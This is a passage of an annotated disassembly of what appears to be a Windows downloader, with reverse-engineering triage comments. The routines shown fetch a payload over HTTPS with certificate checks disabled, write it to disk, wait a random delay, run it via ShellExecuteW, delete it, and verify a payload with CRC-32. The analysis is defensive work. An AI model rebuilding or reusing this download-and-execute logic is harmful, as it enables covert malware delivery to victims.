.text:00401AA0 FF D6 call esi ; GetProcAddress
.text:00401AA2 68 E8 13 40 00 push offset aWinhttpsendreq ; "WinHttpSendRequest"
.text:00401AA7 57 push edi ; hModule
.text:00401AA8 A3 08 1F 40 00 mov dword_401F08, eax ; dword_401F08 = WinHttpReceiveResponse
.text:00401AAD FF D6 call esi ; GetProcAddress
.text:00401AAF 68 FC 13 40 00 push offset aWinhttpsetopti ; "WinHttpSetOption"
.text:00401AB4 57 push edi ; hModule
.text:00401AB5 A3 E4 1E 40 00 mov dword_401EE4, eax ; dword_401EE4 = WinHttpSendRequest
.text:00401ABA FF D6 call esi ; GetProcAddress
.text:00401ABC 68 10 14 40 00 push offset aWinhttpopenreq ; "WinHttpOpenRequest"
.text:00401AC1 57 push edi ; hModule
.text:00401AC2 A3 18 1F 40 00 mov dword_401F18, eax ; dword_401F18 = WinHttpSetOption
.text:00401AC7 FF D6 call esi ; GetProcAddress
.text:00401AC9 68 24 14 40 00 push offset aWinhttpconnect ; "WinHttpConnect"
.text:00401ACE 57 push edi ; hModule
.text:00401ACF A3 00 1F 40 00 mov dword_401F00, eax ; dword_401F00 = WinHttpOpenRequest
.text:00401AD4 FF D6 call esi ; GetProcAddress
.text:00401AD6 68 34 14 40 00 push offset aWinhttpopen ; "WinHttpOpen"
.text:00401ADB 57 push edi ; hModule
.text:00401ADC A3 0C 1F 40 00 mov dword_401F0C, eax ; dword_401F0C = WinHttpConnect
.text:00401AE1 FF D6 call esi ; GetProcAddress
.text:00401AE3 68 40 14 40 00 push offset aWinhttpreaddat ; "WinHttpReadData"
.text:00401AE8 57 push edi ; hModule
.text:00401AE9 A3 E0 1E 40 00 mov dword_401EE0, eax ; dword_401EE0 = WinHttpOpen
.text:00401AEE FF D6 call esi ; GetProcAddress
.text:00401AF0 5F pop edi
.text:00401AF1 5E pop esi
.text:00401AF2 5D pop ebp
.text:00401AF3 A3 10 1F 40 00 mov dword_401F10, eax ; dword_401F10 = WinHttpReadData
.text:00401AF8 5B pop ebx
.text:00401AF9 59 pop ecx ; the two pop ecx release the local slots
.text:00401AFA 59 pop ecx
.text:00401AFB C3 retn
.text:00401AFB sub_4019C4 endp
.text:00401AFB
.text:00401AFC
.text:00401AFC ; =============== S U B R O U T I N E =======================================
.text:00401AFC ; sub_401AFC: callback with four stdcall arguments (retn 10h); only its address is taken, at start+200. Presumably the SetupIterateCabinetW
.text:00401AFC ; Attributes: bp-based frame
.text:00401AFC ; file callback (arg_4 = notification code, arg_8 = per-file structure) - confirm at start+200/start+20D, which lie outside this excerpt.
.text:00401AFC sub_401AFC proc near ; DATA XREF: start+200o
.text:00401AFC ; For arg_4 == 11h it builds "<lpBuffer><dword_401EF8>.<last 3 characters of the name at [arg_8]>" and copies it to arg_8+12h, returning 1; any other code returns 0.
.text:00401AFC var_400 = word ptr -400h
.text:00401AFC var_3FE = word ptr -3FEh
.text:00401AFC var_3FC = word ptr -3FCh
.text:00401AFC var_3FA = word ptr -3FAh
.text:00401AFC arg_4 = dword ptr 0Ch
.text:00401AFC arg_8 = dword ptr 10h
.text:00401AFC ; NOTE(review): 11h and offset +12h look like SPFILENOTIFY_FILEINCABINET and FILE_IN_CABINET_INFO_W.FullTargetName; if so, that field holds MAX_PATH characters while 200h is passed as the limit - confirm.
.text:00401AFC 55 push ebp
.text:00401AFD 8B EC mov ebp, esp
.text:00401AFF 8B 4D 0C mov ecx, [ebp+arg_4] ; ecx = dispatch code
.text:00401B02 81 EC 00 04 00 00 sub esp, 400h ; 400h bytes of locals; only var_400..var_3FA are referenced
.text:00401B08 33 C0 xor eax, eax ; default return 0
.text:00401B0A 83 E9 11 sub ecx, 11h ; code == 11h?
.text:00401B0D 74 11 jz short loc_401B20
.text:00401B0F 49 dec ecx ; code == 12h?
.text:00401B10 74 07 jz short loc_401B19
.text:00401B12 49 dec ecx ; code == 13h?
.text:00401B13 0F 85 9A 00 00 00 jnz locret_401BB3
.text:00401B19
.text:00401B19 loc_401B19: ; CODE XREF: sub_401AFC+14j
.text:00401B19 33 C0 xor eax, eax ; codes 12h and 13h: return 0
.text:00401B1B E9 93 00 00 00 jmp locret_401BB3
.text:00401B20 ; ---------------------------------------------------------------------------
.text:00401B20
.text:00401B20 loc_401B20: ; CODE XREF: sub_401AFC+11j
.text:00401B20 56 push esi
.text:00401B21 57 push edi
.text:00401B22 8B 7D 10 mov edi, [ebp+arg_8] ; edi = structure pointer
.text:00401B25 FF 37 push dword ptr [edi] ; lpString = first pointer field of the structure
.text:00401B27 FF 15 24 10 40 00 call lstrlenW
.text:00401B2D 83 F8 04 cmp eax, 4 ; the name needs at least 4 characters
.text:00401B30 7D 0A jge short loc_401B3C
.text:00401B32 68 6C 09 00 00 push 96Ch ; error code 2412
.text:00401B37 E8 43 FE FF FF call sub_40197F ; noreturn error exit
.text:00401B3C ; ---------------------------------------------------------------------------
.text:00401B3C
.text:00401B3C loc_401B3C: ; CODE XREF: sub_401AFC+34j
.text:00401B3C 8B 0F mov ecx, [edi] ; ecx = name string, eax = its length in characters
.text:00401B3E 66 8B 54 41 FA mov dx, [ecx+eax*2-6] ; third-from-last character
.text:00401B43 66 89 95 00 FC FF+ mov [ebp+var_400], dx
.text:00401B4A 66 8B 54 41 FC mov dx, [ecx+eax*2-4] ; second-from-last character
.text:00401B4F 66 89 95 02 FC FF+ mov [ebp+var_3FE], dx
.text:00401B56 66 8B 44 41 FE mov ax, [ecx+eax*2-2] ; last character
.text:00401B5B 66 89 85 04 FC FF+ mov [ebp+var_3FC], ax
.text:00401B62 33 C0 xor eax, eax
.text:00401B64 66 89 85 06 FC FF+ mov [ebp+var_3FA], ax ; NUL terminator: var_400 now holds the 3-character suffix
.text:00401B6B 8D 85 00 FC FF FF lea eax, [ebp+var_400]
.text:00401B71 50 push eax ; third %s = suffix
.text:00401B72 FF 35 F8 1E 40 00 push dword_401EF8 ; second %s = buffer that sub_401BB7 fills
.text:00401B78 BE 00 02 00 00 mov esi, 200h ; character limit used for both format calls
.text:00401B7D FF 35 D8 1E 40 00 push lpBuffer ; first %s = global lpBuffer (set at start+8A)
.text:00401B83 68 50 14 40 00 push offset aSS_S ; "%s%s.%s"
.text:00401B88 56 push esi
.text:00401B89 FF 35 EC 1E 40 00 push dword_401EEC ; destination buffer
.text:00401B8F FF 15 FC 1E 40 00 call dword_401EFC ; wnsprintfW pointer stored by sub_4019C4
.text:00401B95 FF 35 EC 1E 40 00 push dword_401EEC ; source = path just built
.text:00401B9B 83 C7 12 add edi, 12h ; edi = arg_8 + 12h (destination inside the structure)
.text:00401B9E 68 60 14 40 00 push offset aS ; "%s"
.text:00401BA3 56 push esi
.text:00401BA4 57 push edi
.text:00401BA5 FF 15 FC 1E 40 00 call dword_401EFC ; wnsprintfW: copy the path into the structure
.text:00401BAB 83 C4 28 add esp, 28h ; remove the ten arguments of both format calls
.text:00401BAE 33 C0 xor eax, eax
.text:00401BB0 5F pop edi
.text:00401BB1 40 inc eax ; return 1
.text:00401BB2 5E pop esi
.text:00401BB3
.text:00401BB3 locret_401BB3: ; CODE XREF: sub_401AFC+17j
.text:00401BB3 ; sub_401AFC+1Fj
.text:00401BB3 C9 leave
.text:00401BB4 C2 10 00 retn 10h
.text:00401BB4 sub_401AFC endp
.text:00401BB4
.text:00401BB7
.text:00401BB7 ; =============== S U B R O U T I N E =======================================
.text:00401BB7 ; sub_401BB7: copies a file-name stem from a UTF-16 path into the buffer pointed to by dword_401EF8. In: eax = path, ecx = length in characters.
.text:00401BB7 ; Stem = text after the last '\' minus its final 4 characters. Out: eax = 1 after copying, 0 when the stem would be shorter than 1 character.
.text:00401BB7 sub_401BB7 proc near ; CODE XREF: start+1ECp
.text:00401BB7 53 push ebx
.text:00401BB8 56 push esi
.text:00401BB9 8B 35 F8 1E 40 00 mov esi, dword_401EF8 ; esi = destination buffer
.text:00401BBF 8B D8 mov ebx, eax ; ebx = path
.text:00401BC1 33 C0 xor eax, eax ; default return 0
.text:00401BC3 57 push edi
.text:00401BC4 8B D1 mov edx, ecx ; edx = scan index, starting at the length
.text:00401BC6 85 C9 test ecx, ecx
.text:00401BC8 7E 0F jle short loc_401BD9 ; length <= 0: skip the scan
.text:00401BCA
.text:00401BCA loc_401BCA: ; CODE XREF: sub_401BB7+1Dj
.text:00401BCA 66 83 3C 53 5C cmp word ptr [ebx+edx*2], 5Ch ; backslash?
.text:00401BCF 74 07 jz short loc_401BD8
.text:00401BD1 4A dec edx ; scan backwards
.text:00401BD2 85 D2 test edx, edx
.text:00401BD4 7F F4 jg short loc_401BCA ; stops at index 0 without testing it
.text:00401BD6 EB 01 jmp short loc_401BD9
.text:00401BD8 ; ---------------------------------------------------------------------------
.text:00401BD8
.text:00401BD8 loc_401BD8: ; CODE XREF: sub_401BB7+18j
.text:00401BD8 42 inc edx ; edx = index just after the backslash
.text:00401BD9
.text:00401BD9 loc_401BD9: ; CODE XREF: sub_401BB7+11j
.text:00401BD9 ; sub_401BB7+1Fj
.text:00401BD9 2B CA sub ecx, edx ; ecx = characters after the separator
.text:00401BDB 8D 79 FC lea edi, [ecx-4] ; edi = stem length (last 4 characters dropped)
.text:00401BDE 83 FF 01 cmp edi, 1
.text:00401BE1 7D 04 jge short loc_401BE7
.text:00401BE3 33 C0 xor eax, eax ; stem too short: return 0
.text:00401BE5 EB 22 jmp short loc_401C09
.text:00401BE7 ; ---------------------------------------------------------------------------
.text:00401BE7
.text:00401BE7 loc_401BE7: ; CODE XREF: sub_401BB7+2Aj
.text:00401BE7 33 C9 xor ecx, ecx ; ecx = copy index
.text:00401BE9 85 FF test edi, edi
.text:00401BEB 7E 1C jle short loc_401C09
.text:00401BED 8D 14 53 lea edx, [ebx+edx*2] ; edx = source pointer
.text:00401BF0
.text:00401BF0 loc_401BF0: ; CODE XREF: sub_401BB7+45j
.text:00401BF0 66 8B 1A mov bx, [edx] ; bx reused as the copy temporary
.text:00401BF3 66 89 1C 4E mov [esi+ecx*2], bx ; NOTE(review): no destination size check is visible here
.text:00401BF7 41 inc ecx
.text:00401BF8 42 inc edx
.text:00401BF9 42 inc edx
.text:00401BFA 3B CF cmp ecx, edi
.text:00401BFC 7C F2 jl short loc_401BF0
.text:00401BFE 85 C9 test ecx, ecx
.text:00401C00 7E 07 jle short loc_401C09
.text:00401C02 33 C0 xor eax, eax
.text:00401C04 66 89 04 4E mov [esi+ecx*2], ax ; NUL-terminate the copy
.text:00401C08 40 inc eax ; return 1
.text:00401C09
.text:00401C09 loc_401C09: ; CODE XREF: sub_401BB7+2Ej
.text:00401C09 ; sub_401BB7+34j ...
.text:00401C09 5F pop edi
.text:00401C0A 5E pop esi
.text:00401C0B 5B pop ebx
.text:00401C0C C3 retn
.text:00401C0C sub_401BB7 endp
.text:00401C0C
.text:00401C0D
.text:00401C0D ; =============== S U B R O U T I N E =======================================
.text:00401C0D ; sub_401C0D(lpString, arg_4 = pointer to an output size): splits lpString at its first "/" into host and path, requests the path with GET over
.text:00401C0D ; Attributes: bp-based frame
.text:00401C0D ; WinHTTP on port 443, and reads the body into a 200000h-byte VirtualAlloc buffer. Returns the buffer in eax and the byte count in *arg_4, or 0 on failure.
.text:00401C0D ; int __cdecl sub_401C0D(LPCWSTR lpString, int)
.text:00401C0D sub_401C0D proc near ; CODE XREF: start+280p
.text:00401C0D ; Triage notes: security flags 3300h are set on the request, so certificate errors are ignored; the User-Agent is the fixed "Mozilla/4.0 (compatible; MSIE 7.0; ..." string.
.text:00401C0D String = word ptr -42Ch
.text:00401C0D var_224 = word ptr -224h
.text:00401C0D var_1C = dword ptr -1Ch
.text:00401C0D var_18 = dword ptr -18h
.text:00401C0D var_14 = dword ptr -14h
.text:00401C0D var_10 = dword ptr -10h
.text:00401C0D var_C = dword ptr -0Ch
.text:00401C0D var_8 = dword ptr -8
.text:00401C0D lpAddress = dword ptr -4
.text:00401C0D lpString = dword ptr 8
.text:00401C0D arg_4 = dword ptr 0Ch
.text:00401C0D ; NOTE(review): the WinHTTP handles are never closed, the VirtualAlloc result is not checked, and the buffer is not freed when zero bytes were read.
.text:00401C0D 55 push ebp
.text:00401C0E 8B EC mov ebp, esp
.text:00401C10 81 EC 2C 04 00 00 sub esp, 42Ch
.text:00401C16 53 push ebx
.text:00401C17 56 push esi
.text:00401C18 57 push edi
.text:00401C19 68 68 14 40 00 push offset asc_401468 ; "/"
.text:00401C1E FF 75 08 push [ebp+lpString]
.text:00401C21 FF 15 F4 1E 40 00 call dword_401EF4 ; StrStrIW pointer from sub_4019C4: eax = first "/" in lpString (a NULL result is not handled)
.text:00401C27 50 push eax ; source = path part
.text:00401C28 BF 60 14 40 00 mov edi, offset aS ; "%s"
.text:00401C2D 57 push edi
.text:00401C2E BE 04 01 00 00 mov esi, 104h ; character limit for both copies
.text:00401C33 8D 85 D4 FB FF FF lea eax, [ebp+String]
.text:00401C39 56 push esi
.text:00401C3A 50 push eax
.text:00401C3B FF 15 FC 1E 40 00 call dword_401EFC ; wnsprintfW: String = path part
.text:00401C41 FF 75 08 push [ebp+lpString]
.text:00401C44 8D 85 DC FD FF FF lea eax, [ebp+var_224]
.text:00401C4A 57 push edi
.text:00401C4B 56 push esi
.text:00401C4C 50 push eax
.text:00401C4D FF 15 FC 1E 40 00 call dword_401EFC ; wnsprintfW: var_224 = copy of the whole lpString
.text:00401C53 8B 35 24 10 40 00 mov esi, lstrlenW
.text:00401C59 83 C4 20 add esp, 20h ; remove the eight arguments of the two format calls
.text:00401C5C FF 75 08 push [ebp+lpString] ; lpString
.text:00401C5F FF D6 call esi ; lstrlenW
.text:00401C61 8B F8 mov edi, eax ; edi = total length
.text:00401C63 8D 85 D4 FB FF FF lea eax, [ebp+String]
.text:00401C69 50 push eax ; lpString
.text:00401C6A FF D6 call esi ; lstrlenW
.text:00401C6C 33 F6 xor esi, esi ; esi = 0 for the rest of the function
.text:00401C6E 56 push esi
.text:00401C6F 56 push esi
.text:00401C70 56 push esi
.text:00401C71 2B F8 sub edi, eax ; edi = host length (total - path)
.text:00401C73 56 push esi
.text:00401C74 33 C0 xor eax, eax
.text:00401C76 68 70 14 40 00 push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 7.0; Wind"...
.text:00401C7B 66 89 84 7D DC FD+ mov [ebp+edi*2+var_224], ax ; truncate var_224 to the host part
.text:00401C83 C7 45 E8 00 33 00+ mov [ebp+var_18], 3300h ; value later passed with option 1Fh
.text:00401C8A FF 15 E0 1E 40 00 call dword_401EE0 ; WinHttpOpen(User-Agent, 0, 0, 0, 0)
.text:00401C90 3B C6 cmp eax, esi
.text:00401C92 0F 84 14 01 00 00 jz loc_401DAC
.text:00401C98 56 push esi
.text:00401C99 68 BB 01 00 00 push 1BBh ; port 443
.text:00401C9E 8D 8D DC FD FF FF lea ecx, [ebp+var_224]
.text:00401CA4 51 push ecx ; host name
.text:00401CA5 50 push eax ; session handle
.text:00401CA6 FF 15 0C 1F 40 00 call dword_401F0C ; WinHttpConnect
.text:00401CAC 3B C6 cmp eax, esi
.text:00401CAE 0F 84 F8 00 00 00 jz loc_401DAC
.text:00401CB4 68 00 00 80 00 push 800000h ; request flags = 800000h (WINHTTP_FLAG_SECURE)
.text:00401CB9 56 push esi
.text:00401CBA 56 push esi
.text:00401CBB 56 push esi
.text:00401CBC 8D 8D D4 FB FF FF lea ecx, [ebp+String]
.text:00401CC2 51 push ecx ; object name = path part
.text:00401CC3 68 D8 14 40 00 push offset aGet ; "GET"
.text:00401CC8 50 push eax ; connection handle
.text:00401CC9 FF 15 00 1F 40 00 call dword_401F00 ; WinHttpOpenRequest
.text:00401CCF 6A 04 push 4
.text:00401CD1 5B pop ebx ; ebx = 4: option value size, reused later as flProtect
.text:00401CD2 8B F8 mov edi, eax ; edi = request handle
.text:00401CD4 53 push ebx
.text:00401CD5 8D 45 E8 lea eax, [ebp+var_18]
.text:00401CD8 50 push eax
.text:00401CD9 6A 1F push 1Fh ; option 1Fh (WINHTTP_OPTION_SECURITY_FLAGS)
.text:00401CDB 57 push edi
.text:00401CDC 89 7D F4 mov [ebp+var_C], edi ; var_C = request handle for the read loop
.text:00401CDF FF 15 18 1F 40 00 call dword_401F18 ; WinHttpSetOption: 3300h = ignore unknown CA, wrong usage, CN mismatch and date errors
.text:00401CE5 53 push ebx
.text:00401CE6 8D 45 F0 lea eax, [ebp+var_10]
.text:00401CE9 50 push eax
.text:00401CEA 6A 3F push 3Fh ; option 3Fh (looks like WINHTTP_OPTION_DISABLE_FEATURE - TODO confirm)
.text:00401CEC 57 push edi
.text:00401CED C7 45 F0 0A 00 00+ mov [ebp+var_10], 0Ah ; value for option 3Fh (presumably redirects and keep-alive disabled - TODO confirm)
.text:00401CF4 89 75 E4 mov [ebp+var_1C], esi ; value 0 for option 58h below
.text:00401CF7 FF 15 18 1F 40 00 call dword_401F18 ; WinHttpSetOption
.text:00401CFD 53 push ebx
.text:00401CFE 8D 45 E4 lea eax, [ebp+var_1C]
.text:00401D01 50 push eax
.text:00401D02 6A 58 push 58h ; option 58h (looks like WINHTTP_OPTION_REDIRECT_POLICY - TODO confirm)
.text:00401D04 57 push edi
.text:00401D05 FF 15 18 1F 40 00 call dword_401F18 ; WinHttpSetOption
.text:00401D0B 3B FE cmp edi, esi ; the request handle is NULL-checked only after the three option calls
.text:00401D0D 0F 84 99 00 00 00 jz loc_401DAC
.text:00401D13 56 push esi
.text:00401D14 56 push esi
.text:00401D15 56 push esi
.text:00401D16 56 push esi
.text:00401D17 56 push esi
.text:00401D18 56 push esi
.text:00401D19 57 push edi
.text:00401D1A FF 15 E4 1E 40 00 call dword_401EE4 ; WinHttpSendRequest with no extra headers or body
.text:00401D20 85 C0 test eax, eax
.text:00401D22 0F 84 84 00 00 00 jz loc_401DAC
.text:00401D28 56 push esi
.text:00401D29 57 push edi
.text:00401D2A FF 15 08 1F 40 00 call dword_401F08 ; WinHttpReceiveResponse
.text:00401D30 85 C0 test eax, eax
.text:00401D32 74 78 jz short loc_401DAC
.text:00401D34 53 push ebx ; flProtect = 4 (PAGE_READWRITE)
.text:00401D35 68 00 10 00 00 push 1000h ; flAllocationType = MEM_COMMIT
.text:00401D3A BB 00 00 20 00 mov ebx, 200000h ; ebx = buffer capacity (2 MiB)
.text:00401D3F 53 push ebx ; dwSize
.text:00401D40 56 push esi ; lpAddress
.text:00401D41 FF 15 34 10 40 00 call VirtualAlloc
.text:00401D47 89 45 FC mov [ebp+lpAddress], eax ; NOTE(review): not checked for NULL before the read loop
.text:00401D4A 33 FF xor edi, edi ; edi = bytes received so far
.text:00401D4C
.text:00401D4C loc_401D4C: ; CODE XREF: sub_401C0D+17Bj
.text:00401D4C 8D 45 F8 lea eax, [ebp+var_8]
.text:00401D4F 50 push eax
.text:00401D50 FF 75 F4 push [ebp+var_C]
.text:00401D53 89 75 F8 mov [ebp+var_8], esi ; available = 0 before the query
.text:00401D56 FF 15 14 1F 40 00 call dword_401F14 ; WinHttpQueryDataAvailable(request, &var_8)
.text:00401D5C 8B 45 F8 mov eax, [ebp+var_8]
.text:00401D5F 8D 0C 38 lea ecx, [eax+edi] ; ecx = received + available
.text:00401D62 3B CB cmp ecx, ebx
.text:00401D64 77 32 ja short loc_401D98 ; would exceed the buffer: free it and fail
.text:00401D66 3B C6 cmp eax, esi
.text:00401D68 76 20 jbe short loc_401D8A ; nothing available: finished
.text:00401D6A 8D 4D EC lea ecx, [ebp+var_14]
.text:00401D6D 51 push ecx ; out: bytes actually read
.text:00401D6E 50 push eax ; bytes to read = available
.text:00401D6F 8B 45 FC mov eax, [ebp+lpAddress]
.text:00401D72 03 C7 add eax, edi
.text:00401D74 50 push eax ; destination = lpAddress + received
.text:00401D75 FF 75 F4 push [ebp+var_C]
.text:00401D78 FF 15 10 1F 40 00 call dword_401F10 ; WinHttpReadData
.text:00401D7E 85 C0 test eax, eax
.text:00401D80 74 03 jz short loc_401D85
.text:00401D82 03 7D EC add edi, [ebp+var_14] ; advance by the bytes actually read
.text:00401D85
.text:00401D85 loc_401D85: ; CODE XREF: sub_401C0D+173j
.text:00401D85 39 75 F8 cmp [ebp+var_8], esi
.text:00401D88 77 C2 ja short loc_401D4C ; loop while the last query reported data
.text:00401D8A
.text:00401D8A loc_401D8A: ; CODE XREF: sub_401C0D+15Bj
.text:00401D8A 3B FE cmp edi, esi
.text:00401D8C 76 1E jbe short loc_401DAC ; zero bytes read: return 0 (buffer stays allocated)
.text:00401D8E 8B 45 0C mov eax, [ebp+arg_4]
.text:00401D91 89 38 mov [eax], edi ; *arg_4 = total bytes read
.text:00401D93 8B 45 FC mov eax, [ebp+lpAddress] ; return the buffer
.text:00401D96 EB 16 jmp short loc_401DAE
.text:00401D98 ; ---------------------------------------------------------------------------
.text:00401D98
.text:00401D98 loc_401D98: ; CODE XREF: sub_401C0D+157j
.text:00401D98 39 75 FC cmp [ebp+lpAddress], esi
.text:00401D9B 74 0F jz short loc_401DAC
.text:00401D9D 68 00 80 00 00 push 8000h ; dwFreeType = MEM_RELEASE
.text:00401DA2 56 push esi ; dwSize
.text:00401DA3 FF 75 FC push [ebp+lpAddress] ; lpAddress
.text:00401DA6 FF 15 0C 10 40 00 call VirtualFree
.text:00401DAC
.text:00401DAC loc_401DAC: ; CODE XREF: sub_401C0D+85j
.text:00401DAC ; sub_401C0D+A1j ...
.text:00401DAC 33 C0 xor eax, eax ; failure: return 0
.text:00401DAE
.text:00401DAE loc_401DAE: ; CODE XREF: sub_401C0D+189j
.text:00401DAE 5F pop edi
.text:00401DAF 5E pop esi
.text:00401DB0 5B pop ebx
.text:00401DB1 C9 leave
.text:00401DB2 C3 retn
.text:00401DB2 sub_401C0D endp
.text:00401DB2
.text:00401DB3
.text:00401DB3 ; =============== S U B R O U T I N E =======================================
.text:00401DB3 ; sub_401DB3(lpBuffer, nNumberOfBytesToWrite): writes the buffer to a new file, opens that file through the ShellExecuteW pointer, then deletes it.
.text:00401DB3 ; Attributes: bp-based frame
.text:00401DB3 ; File name = global lpBuffer string + the string sub_4017BB(var_20C, 6, 1) leaves in var_20C (sub_4017BB starts above this excerpt; presumably a generated name - confirm).
.text:00401DB3 ; int __cdecl sub_401DB3(LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite)
.text:00401DB3 sub_401DB3 proc near ; CODE XREF: start+2CFp
.text:00401DB3 ; Sequence: CreateFileW, WriteFile, CloseHandle, Sleep(random 60000..120000 ms), ShellExecuteW, Sleep(10000 ms), DeleteFileW.
.text:00401DB3 FileName = word ptr -60Ch
.text:00401DB3 var_20C = byte ptr -20Ch
.text:00401DB3 NumberOfBytesWritten= dword ptr -4
.text:00401DB3 lpBuffer = dword ptr 8
.text:00401DB3 nNumberOfBytesToWrite= dword ptr 0Ch
.text:00401DB3 ; Triage notes: the file is deleted 10 s after it is opened, so it exists on disk only briefly. eax is not set explicitly before return; NumberOfBytesWritten is never compared with the request.
.text:00401DB3 55 push ebp
.text:00401DB4 8B EC mov ebp, esp
.text:00401DB6 81 EC 0C 06 00 00 sub esp, 60Ch
.text:00401DBC 56 push esi
.text:00401DBD 57 push edi
.text:00401DBE 6A 01 push 1 ; third argument to sub_4017BB
.text:00401DC0 8D 85 F4 FD FF FF lea eax, [ebp+var_20C]
.text:00401DC6 6A 06 push 6 ; second argument to sub_4017BB
.text:00401DC8 50 push eax ; first argument = var_20C
.text:00401DC9 E8 ED F9 FF FF call sub_4017BB
.text:00401DCE 8D 85 F4 FD FF FF lea eax, [ebp+var_20C]
.text:00401DD4 50 push eax ; second %s = var_20C
.text:00401DD5 FF 35 D8 1E 40 00 push lpBuffer ; first %s = global at 00401ED8, not the stack argument of the same name
.text:00401DDB 8D 85 F4 F9 FF FF lea eax, [ebp+FileName]
.text:00401DE1 68 D0 11 40 00 push offset aSS ; "%s%s"
.text:00401DE6 68 00 02 00 00 push 200h ; character limit; FileName spans 400h bytes
.text:00401DEB 50 push eax
.text:00401DEC FF 15 FC 1E 40 00 call dword_401EFC ; wnsprintfW pointer stored by sub_4019C4
.text:00401DF2 83 C4 20 add esp, 20h ; remove the 3 sub_4017BB arguments and the 5 format arguments
.text:00401DF5 33 FF xor edi, edi ; edi = 0
.text:00401DF7 57 push edi ; hTemplateFile
.text:00401DF8 68 80 00 00 00 push 80h ; dwFlagsAndAttributes = FILE_ATTRIBUTE_NORMAL
.text:00401DFD 6A 02 push 2 ; dwCreationDisposition = CREATE_ALWAYS
.text:00401DFF 57 push edi ; lpSecurityAttributes
.text:00401E00 6A 01 push 1 ; dwShareMode = FILE_SHARE_READ
.text:00401E02 68 00 00 00 40 push 40000000h ; dwDesiredAccess = GENERIC_WRITE
.text:00401E07 8D 85 F4 F9 FF FF lea eax, [ebp+FileName]
.text:00401E0D 50 push eax ; lpFileName
.text:00401E0E FF 15 20 10 40 00 call CreateFileW
.text:00401E14 8B F0 mov esi, eax
.text:00401E16 83 FE FF cmp esi, 0FFFFFFFFh ; INVALID_HANDLE_VALUE?
.text:00401E19 74 61 jz short loc_401E7C
.text:00401E1B 53 push ebx
.text:00401E1C 57 push edi ; lpOverlapped
.text:00401E1D 8D 45 FC lea eax, [ebp+NumberOfBytesWritten]
.text:00401E20 50 push eax ; lpNumberOfBytesWritten
.text:00401E21 FF 75 0C push [ebp+nNumberOfBytesToWrite] ; nNumberOfBytesToWrite
.text:00401E24 FF 75 08 push [ebp+lpBuffer] ; lpBuffer
.text:00401E27 56 push esi ; hFile
.text:00401E28 FF 15 10 10 40 00 call WriteFile
.text:00401E2E 56 push esi ; hObject
.text:00401E2F 8B D8 mov ebx, eax ; ebx = WriteFile result, tested after the sleep
.text:00401E31 FF 15 48 10 40 00 call CloseHandle
.text:00401E37 68 60 EA 00 00 push 0EA60h ; lower bound = 60000
.text:00401E3C B8 C0 D4 01 00 mov eax, 1D4C0h ; upper bound = 120000
.text:00401E41 E8 5B FA FF FF call sub_4018A1 ; eax = random delay in milliseconds
.text:00401E46 8B 35 14 10 40 00 mov esi, Sleep
.text:00401E4C 59 pop ecx ; drop the sub_4018A1 argument
.text:00401E4D 50 push eax ; dwMilliseconds
.text:00401E4E FF D6 call esi ; Sleep
.text:00401E50 3B DF cmp ebx, edi ; did WriteFile fail?
.text:00401E52 5B pop ebx ; restores ebx; pop does not change the flags from cmp
.text:00401E53 74 27 jz short loc_401E7C
.text:00401E55 6A 0A push 0Ah ; show command = 10 (SW_SHOWDEFAULT)
.text:00401E57 57 push edi
.text:00401E58 57 push edi
.text:00401E59 8D 85 F4 F9 FF FF lea eax, [ebp+FileName]
.text:00401E5F 50 push eax ; file to open = FileName
.text:00401E60 57 push edi
.text:00401E61 57 push edi
.text:00401E62 FF 15 DC 1E 40 00 call dword_401EDC ; ShellExecuteW pointer stored by sub_4019C4; result not checked
.text:00401E68 68 10 27 00 00 push 2710h ; dwMilliseconds = 10000
.text:00401E6D FF D6 call esi ; Sleep
.text:00401E6F 8D 85 F4 F9 FF FF lea eax, [ebp+FileName]
.text:00401E75 50 push eax ; lpFileName
.text:00401E76 FF 15 4C 10 40 00 call DeleteFileW
.text:00401E7C
.text:00401E7C loc_401E7C: ; CODE XREF: sub_401DB3+66j
.text:00401E7C ; sub_401DB3+A0j
.text:00401E7C 5F pop edi
.text:00401E7D 5E pop esi
.text:00401E7E C9 leave
.text:00401E7F C3 retn
.text:00401E7F sub_401DB3 endp
.text:00401E7F
.text:00401E80
.text:00401E80 ; =============== S U B R O U T I N E =======================================
.text:00401E80 ; sub_401E80(arg_0 = data, arg_4 = length in bytes): bitwise 32-bit checksum over the buffer, returned in eax. Used by sub_4018C7 to verify the decoded payload.
.text:00401E80 ; Attributes: bp-based frame
.text:00401E80 ; State is kept as bytes cl, ch, dl, dh (low to high), starts at FFFFFFFFh, is reduced with the constants EDB8h:8320h on carry-out, and is complemented at the end.
.text:00401E80 sub_401E80 proc near ; CODE XREF: sub_4018C7+2Ap
.text:00401E80 ; These parameters match the common reflected CRC-32 (polynomial EDB88320h) - TODO confirm against a reference implementation.
.text:00401E80 var_4 = dword ptr -4
.text:00401E80 arg_0 = dword ptr 8
.text:00401E80 arg_4 = dword ptr 0Ch
.text:00401E80 ; NOTE(review): the byte loop is dec/jnz, so a length of 0 would wrap instead of exiting; the caller shown (sub_4018C7) always passes at least 3F8h.
.text:00401E80 55 push ebp
.text:00401E81 8B EC mov ebp, esp
.text:00401E83 51 push ecx ; reserves the var_4 slot
.text:00401E84 53 push ebx
.text:00401E85 56 push esi
.text:00401E86 57 push edi
.text:00401E87 60 pusha ; save all registers; the result is passed out through var_4
.text:00401E88 8B 75 08 mov esi, [ebp+arg_0] ; esi = data pointer
.text:00401E8B 8B 7D 0C mov edi, [ebp+arg_4] ; edi = bytes remaining
.text:00401E8E FC cld ; lodsb walks forward
.text:00401E8F 33 C9 xor ecx, ecx
.text:00401E91 49 dec ecx ; ecx = FFFFFFFFh
.text:00401E92 8B D1 mov edx, ecx ; edx = FFFFFFFFh (initial state)
.text:00401E94
.text:00401E94 loc_401E94: ; CODE XREF: sub_401E80+3Dj
.text:00401E94 33 C0 xor eax, eax
.text:00401E96 33 DB xor ebx, ebx
.text:00401E98 AC lodsb ; al = next input byte
.text:00401E99 32 C1 xor al, cl ; mix with the low state byte
.text:00401E9B 8A CD mov cl, ch ; shift the state down by one byte
.text:00401E9D 8A EA mov ch, dl
.text:00401E9F 8A D6 mov dl, dh
.text:00401EA1 B6 08 mov dh, 8 ; dh doubles as the bit counter
.text:00401EA3
.text:00401EA3 loc_401EA3: ; CODE XREF: sub_401E80+36j
.text:00401EA3 66 D1 EB shr bx, 1 ; shift bx:ax right by one bit
.text:00401EA6 66 D1 D8 rcr ax, 1 ; CF = bit shifted out
.text:00401EA9 73 09 jnb short loc_401EB4
